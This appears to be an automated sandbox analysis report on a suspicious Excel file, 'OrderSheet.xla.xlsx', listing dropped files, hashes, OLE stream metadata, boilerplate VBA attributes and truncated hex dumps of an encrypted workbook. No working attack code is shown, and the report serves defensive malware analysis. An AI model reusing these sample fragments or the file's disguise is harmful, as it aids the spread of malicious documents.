                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                            Category:dropped
                            Size (bytes):758601
                            Entropy (8bit):7.98639316555857
                            Encrypted:false
                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                            MD5:3A49135134665364308390AC398006F1
                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                            Category:dropped
                            Size (bytes):1419751
                            Entropy (8bit):7.976496077007677
                            Encrypted:false
                            SSDEEP:24576:6DaWL07oXGZGwYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:caWLxXGZGwZGh3mlind9i4ufFXpAXkru
                            MD5:7867DAFF192926A49EB7516D226D452F
                            SHA1:BD0B185B12DB865CEA23060A9789C6B2D814B62E
                            SHA-256:C7586BA81615BBAA63DA0D81CE18C0D087D1237500C99C35239A4D3CAEED2934
                            SHA-512:B556042E82056983EA6A69AEE0DAB370641437EF6239FD04676FC26EC9472C6E5EF6194885C165E3987E8019321DCD9B4A574EA7A6253AC3C9468434AEAA0C21
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                            Category:dropped
                            Size (bytes):386528
                            Entropy (8bit):7.9736851559892425
                            Encrypted:false
                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                            Category:dropped
                            Size (bytes):1407294
                            Entropy (8bit):7.97605879016224
                            Encrypted:false
                            SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                            MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                            SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                            SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                            SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):114688
                            Entropy (8bit):5.960294683466808
                            Encrypted:false
                            SSDEEP:3072:BeCk3hbdlylKsgwyzcTbWhZFGkE+cLaxHAknovZaFhcW8PI9+:Bzk3hbdlylKsgwyzcTbWhZFVE+WaxHAt
                            MD5:F126C2A2D94FAA5319FAB0F9C46AA330
                            SHA1:A39928BA89A54A760062B319FB71769E6BED0BAD
                            SHA-256:C070BC5CC87787F76F665B652DC2311D1ACF7A00DF18353E205DB5DA7A953DFA
                            SHA-512:8FB0D68AE643F3BA20F2930D3EA396F49F7B967B5E57705B3710AC1046AC87B37965BAC453D8A3D9B0784CA960E0D3E60E69C221B6B98615121055CD18DB0D05
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:48:54 2024, Security: 1
                            Category:dropped
                            Size (bytes):798720
                            Entropy (8bit):7.637719943178928
                            Encrypted:false
                            SSDEEP:12288:egW+CJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jHEPAymzDtL:WBaebARM8FA8Z+j2AymntL
                            MD5:BBD5B7ABB5DDCC0C0D6D732C2493A4CD
                            SHA1:90AAE4166734661A069E178739C179C68DD22B3C
                            SHA-256:D95142A19BD072AB691B2D45577078945CE588DF23B194AD1840B79B8B9BDA91
                            SHA-512:738492CA385358045A48573E4D6BC9E381C9FD79BE4058163796F2BD0AE92073EA51BA3722962B16ACFE83EDF8B16D7B808519DB3E356DFB2E9F892B4A3F4828
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:48:54 2024, Security: 1
                            Category:dropped
                            Size (bytes):798720
                            Entropy (8bit):7.637719943178928
                            Encrypted:false
                            SSDEEP:12288:egW+CJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jHEPAymzDtL:WBaebARM8FA8Z+j2AymntL
                            MD5:BBD5B7ABB5DDCC0C0D6D732C2493A4CD
                            SHA1:90AAE4166734661A069E178739C179C68DD22B3C
                            SHA-256:D95142A19BD072AB691B2D45577078945CE588DF23B194AD1840B79B8B9BDA91
                            SHA-512:738492CA385358045A48573E4D6BC9E381C9FD79BE4058163796F2BD0AE92073EA51BA3722962B16ACFE83EDF8B16D7B808519DB3E356DFB2E9F892B4A3F4828
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):165
                            Entropy (8bit):1.5231029153786204
                            Encrypted:false
                            SSDEEP:3:sYp5lFltt:sYp5Nv
                            MD5:B77267835A6BEAC785C351BDE8E1A61C
                            SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                            SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                            SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                            Malicious:true
                            Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 9 07:06:58 2024, Security: 1
                            Entropy (8bit):7.7617791884560114
                            TrID:
                            • Microsoft Excel sheet (30009/1) 47.99%
                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                            File name:OrderSheet.xla.xlsx
                            File size:1'071'616 bytes
                            MD5:f11d4f4a1c4b40a38a0d32a65b464853
                            SHA1:0bf28b871d1169fbbe565cf18b032f55f0479cae
                            SHA256:57d8d4a52a8ae466a911161272b5416bff18784c91fcf631e193a2cbc4376920
                            SHA512:5ae6de71b74a23587897afebaa4f6c814679d71c702b435cd59dc4d126241c12562c6d71b1e7b74a06cd5d41c5f3f0095a2e56b58cde6daa84ae090037a5b5b6
                            SSDEEP:24576:IBabbARM89X8Z+joLk/E/3XTIu6M1POdcN:IRRXXjoL/3o0POmN
                            TLSH:CC35F1D1B68DAB11DA55023575F3839E2720EC53E90252BB32F8B31E2AF76D08543F56
                            Icon Hash:35e58a8c0c8a85b9
                            Document Type:OLE
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Code Page:1252
                            Author:
                            Last Saved By:
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2024-12-09 07:06:58
                            Creating Application:Microsoft Excel
                            Security:1
                            Document Code Page:1252
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:786432
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet1"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet2"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet1"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet2"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                            VBA File Name:Sheet3.cls
                            Stream Size:977
                            Attribute VB_Name = "Sheet3"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            

                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.889430592781307
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:200
                            Entropy:3.2465758799941646
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . J . . . . . . . . .
                            General
                            Stream Path:MBD00016415/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:94
                            Entropy:4.345966460061678
                            Base64 Encoded:False
                            Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                            General
                            Stream Path:MBD00016415/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:20
                            Entropy:0.5689955935892812
                            Base64 Encoded:False
                            General
                            Stream Path:MBD00016415/CONTENTS
                            CLSID:
                            File Type:PDF document, version 1.3, 1 pages
                            Stream Size:29526
                            Entropy:7.810444862277873
                            Base64 Encoded:True
                            Data ASCII:% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / C r o p B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
                            Data Raw:25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0d 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 43 72 6f 70 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0a 2f 52 6f 74 61 74 65 20 30 20 2f 52 65 73 6f 75
                            General
                            Stream Path:MBD00016416/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.701136490257069
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                            General
                            Stream Path:MBD00016416/\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:220
                            Entropy:3.372234242231489
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:MBD00016416/MBD0018D4CE/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:20
                            Entropy:0.5689955935892812
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/MBD0018D4CE/\x3ObjInfo
                            CLSID:
                            File Type:data
                            Stream Size:4
                            Entropy:0.8112781244591328
                            Base64 Encoded:False
                            Data ASCII:. . . .
                            Data Raw:00 00 03 00
                            General
                            Stream Path:MBD00016416/MBD0018D4CE/Contents
                            CLSID:
                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                            Stream Size:197671
                            Entropy:6.989042939766534
                            Base64 Encoded:True
                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/MBD0068D442/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/MBD0068D442/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:26243
                            Entropy:7.635433729726103
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/MBD007203CB/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD00016416/MBD007203CB/\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:248
                            Entropy:3.0523231150355867
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:MBD00016416/MBD007203CB/\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:256
                            Entropy:4.086306928392587
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                            General
                            Stream Path:MBD00016416/MBD007203CB/Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:134792
                            Entropy:7.974168320310173
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                            General
